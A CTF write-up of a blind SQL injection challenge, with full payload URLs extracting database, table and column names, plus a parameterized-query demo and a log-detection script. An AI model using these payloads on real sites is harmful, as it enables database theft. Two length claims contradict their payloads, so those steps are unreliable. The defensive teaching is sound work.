WEB_Simple SQL Injection, Part 3

Date: 2017.9.29

Challenge link: www.shiyanbar.com/ctf/1909

Approach: boolean-based blind injection; the backend database is MySQL.

1) http://ctf5.shiyanbar.com/web/index_3.php?id=1 and 1=1 / 1=2 -> no change

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and '1'='1 / '1'='2 -> the page changes

Conclusion: this is a boolean-based blind injection (the parameter sits inside single quotes in the query).
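As an added illustration (not part of the original writeup), the Python snippet below reproduces what step 1 reveals: the id is spliced into a quoted string in the SQL text, so a quote in the input rewrites the WHERE clause, while a bound parameter keeps the whole input as a single value. SQLite stands in for the challenge's MySQL backend, the `posts` table and its rows are constructed, and the function names are mine. MySQL leniently converts a string such as '1 and 1=2' to the number 1 when comparing it with an integer column, which is why the unquoted probes show no change; SQLite does not do that, so only the quoted probes are exercised here.

```python
import sqlite3

# Constructed sample schema; the challenge's real table layout is unknown.
# SQLite stands in for the MySQL backend described in the writeup.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)",
                     [(1, "first post"), (2, "second post")])
    return conn

def lookup_vulnerable(conn, user_id):
    # The pattern step 1 infers: the id lands inside single quotes in the SQL
    # text, so a quote in the input ends the literal and the rest is parsed as SQL.
    sql = "SELECT title FROM posts WHERE id = '" + user_id + "'"
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, user_id):
    # Bound parameter: the entire input is compared as one value and never
    # reaches the SQL parser, so the boolean probes cannot alter the query.
    cur = conn.execute("SELECT title FROM posts WHERE id = ?", (user_id,))
    return [row[0] for row in cur]

def compare(user_id):
    """Return (rows from the concatenated query, rows from the parameterized query)."""
    conn = make_db()
    return lookup_vulnerable(conn, user_id), lookup_safe(conn, user_id)

if __name__ == "__main__":
    for probe in ["1", "1' and '1'='1", "1' and '1'='2"]:
        print(repr(probe), compare(probe))
```

For the plain id both versions return the same row; for the two quoted probes the concatenated query returns the row or nothing depending on the appended condition (the signal the rest of the writeup exploits), while the parameterized query simply finds no id equal to the literal string and returns nothing either way.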

2) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(database())>0 -> error

This statement kept erroring. I knew the single quote was left unclosed but did not know how to write it, so I ran sqlmap and learned the correct form, which shows that the current database name is 4 characters long:

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(database())=4 and '1'='1

3) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),1,1))=119 and '1'='1 -> w

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),2,1))=101 and '1'='1 -> e

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),3,1))=119 and '1'='1 -> b

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr(database(),4,1))=49 and '1'='1 -> 1

   So the database name is web1.

4) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 and '1'='1 -> the web1 database contains 2 tables

5) http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=4 and '1'='1 -> the first table name is 4 characters long

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=4 and '1'='1 -> the second table name is 5 characters long

6) Guess the first table name first.

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=102 and '1'='1 -> f

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=108 and '1'='1 -> l

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=97 and '1'='1 -> a

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=103 and '1'='1 -> g

   So the first table is named flag.

7) Next, determine the number of columns in the flag table.

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and (select count(column_name) from information_schema.columns where table_name='flag')=2 and '1'='1 -> the flag table has only 2 columns

8) Determine the lengths of the 2 column names in the flag table.

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1))=4 and '1'='1 -> the first column name is 4 characters long

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and length(substr((select column_name from information_schema.columns where table_name='flag' limit 1,1),1))=4 and '1'='1 -> the second column name is 2 characters long

9) Determine the names of the 2 columns in the flag table.

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1,1))=102 and '1'='1 -> f

   http://ctf5.shiyanbar.com/web/index_3.php?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),2,1))=108 and '1'='1 -> l

   And so on for the remaining characters.

10) Extract the data.

The steps are all the same as above. Manual injection is really tedious; sqlmap can do it directly and is much faster.
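Added example from the defender's side, not part of the original post: the probing grammar used throughout this writeup (a stray closing quote, `and '1'='1`, `ascii(substr(...))`, `length(database())`, lookups against `information_schema`) is easy to recognise in web server access logs, even though every individual request returns a normal 200, and the sheer number of near-identical requests from one client is itself the tell. The log lines, client IPs, threshold and signature names below are constructed for the example; the request paths mirror the probes in this writeup, percent-encoded as a server would record them.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines in combined log format (not real traffic).
# 198.51.100.7 issues the writeup's probes; 203.0.113.9 is ordinary browsing.
SAMPLE_LOG = """\
198.51.100.7 - - [29/Sep/2017:10:00:01 +0800] "GET /web/index_3.php?id=1 HTTP/1.1" 200 512
198.51.100.7 - - [29/Sep/2017:10:00:02 +0800] "GET /web/index_3.php?id=1%27%20and%20%271%27%3D%271 HTTP/1.1" 200 512
198.51.100.7 - - [29/Sep/2017:10:00:03 +0800] "GET /web/index_3.php?id=1%27%20and%20length(database())%3D4%20and%20%271%27%3D%271 HTTP/1.1" 200 512
198.51.100.7 - - [29/Sep/2017:10:00:04 +0800] "GET /web/index_3.php?id=1%27%20and%20ascii(substr(database(),1,1))%3D119%20and%20%271%27%3D%271 HTTP/1.1" 200 512
198.51.100.7 - - [29/Sep/2017:10:00:05 +0800] "GET /web/index_3.php?id=1%27%20and%20(select%20count(table_name)%20from%20information_schema.tables%20where%20table_schema%3Ddatabase())%3D2%20and%20%271%27%3D%271 HTTP/1.1" 200 512
203.0.113.9 - - [29/Sep/2017:10:00:06 +0800] "GET /web/index_3.php?id=2 HTTP/1.1" 200 498
203.0.113.9 - - [29/Sep/2017:10:00:07 +0800] "GET /web/index_3.php?id=3 HTTP/1.1" 200 503
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures of the boolean-probing grammar; names are constructed for this example.
SIGNATURES = {
    "boolean_compare": re.compile(r"\b(?:and|or)\s+'?\w+'?\s*=\s*'?\w+'?", re.I),
    "char_oracle": re.compile(r"\b(?:ascii|ord|substr|substring|mid|length)\s*\(", re.I),
    "schema_walk": re.compile(r"information_schema\.(?:tables|columns)", re.I),
    "db_function": re.compile(r"\bdatabase\s*\(\s*\)", re.I),
}

def decode_request(path):
    # Decode percent-encoding (and '+') so we match what the application parsed,
    # not the encoded bytes the server logged.
    return unquote_plus(path)

def classify(line):
    """Return (ip, raw path, [matched signature names]) or None for unparsable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_request(m.group("path"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    return m.group("ip"), m.group("path"), hits

def flag_sources(log_text, threshold=3):
    """Return {ip: {signature: count}} for clients with at least `threshold`
    signature-bearing requests; a single hit may be a false positive, a run is not."""
    per_ip = defaultdict(Counter)
    probe_requests = Counter()
    for line in log_text.splitlines():
        parsed = classify(line)
        if not parsed:
            continue
        ip, _, hits = parsed
        if hits:
            probe_requests[ip] += 1
            per_ip[ip].update(hits)
    return {ip: dict(per_ip[ip]) for ip, n in probe_requests.items() if n >= threshold}

if __name__ == "__main__":
    for ip, counts in flag_sources(SAMPLE_LOG).items():
        print(ip, counts)
```

Matching on the decoded query string matters: the quote and `=` arrive as `%27` and `%3D`, so a rule written against the raw log line would miss them. Counting per client rather than per request keeps the rule quiet on a one-off odd parameter while still surfacing the hundreds of sequential requests a character-by-character extraction (manual or sqlmap) produces.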
